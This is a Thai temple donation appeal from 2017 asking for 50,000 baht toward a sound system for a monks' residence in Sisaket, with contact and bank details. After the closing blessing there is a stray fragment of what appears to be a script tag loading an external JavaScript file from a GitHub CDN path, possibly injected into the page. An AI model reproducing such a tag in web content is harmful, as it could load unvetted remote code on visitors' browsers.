ขอเชิญชวนผู้มีศรัทธาพุทธศาสนิกชนร่วมเป็นเจ้าภาพเครื่องเสียงไว้ใช้ในงานปฏิบัติธรรมและกิจกรรมในทางพระพุทธศาสนา

 puhenpai    27 มี.ค. 2560

ขอเชิญชวนผู้มีศรัทธาพุทธศาสนิกชนร่วมเป็นเจ้าภาพเครื่องเสียงไว้ใช้ในงานปฏิบัติธรรมและกิจกรรมในทางพระพุทธศาสนา
เนื่องด้วยทางที่พักสงฆ์มงคลธรรม เป็นที่พักสงฆ์แห่งใหม่ก่อตั้งได้ไม่นานแต่ก็ได้จัดให้เป็นสถานที่ปฏิบัติธรรมและกิจกรรมสำคัญในทางพระพุทธศาสนาตลอดปีและตลอดระยะเวลาที่ได้ก่อตั้งมา แต่ยังขาดสิ่งอำนวยความสะดวกแก่ผู้มาปฏิบัติธรรมที่เหมาะแก่สมณบริโภคโดยเฉพาะเครื่องเสียงที่ใช้ในงานปฏิบัติธรรมก็มีความจำเป็นเพราะต้องใช้สื่อสารการเทศน์สอนธรรมะแก่ผู้เข้าร่วมปฏิบัติธรรม และเครื่องเสียงตัวเก่าก็ชำรุดซ่อมแซมไม่ได้
ทางที่พักสงฆ์มงคลธรรมจึงขอบอกบุญท่านสาธุชนคนใจบุญผู้มีทรัพย์ หรือมีศรัทธาได้ร่วมเป็นเจ้าภาพซื้อเครื่องเสียงไว้ใช้งานในที่พักสงฆ์มงคลธรรม จำนวน 50.000 บาทเพื่อประโยชน์ในการเผยแผ่พระพุทธศาสนา ติดตอขอร่วมบริจาคตามกำลังทรัพย์กำลังศรัทธา ได้ที่
ที่พักสงฆ์มงคลธรรมหมู่ 9 บ้านจำนรรจ์ ตำบลกระแชง อำเภอกันทรลักษ์ จังหวัดศรีสะเกษ 33110 โทรศัพท์ 095-298-9597...... 097-162-5195
หรือโอนข้าบบัญชีธนาคารกรุงไทย ชื่อบัญชี พระพุทธมนต์ สุธมฺโม หมายเลขบัญชี 312 008 7874 อนุโมทนาสาธุบุญ  https://cdn.jsdelivr.net/gh/tatikers/san/dhamma.js">   
  3,548 

  แสดงความคิดเห็น


RELATED STORIESจีรัง กรุ๊ป    

 ธรรมะไทย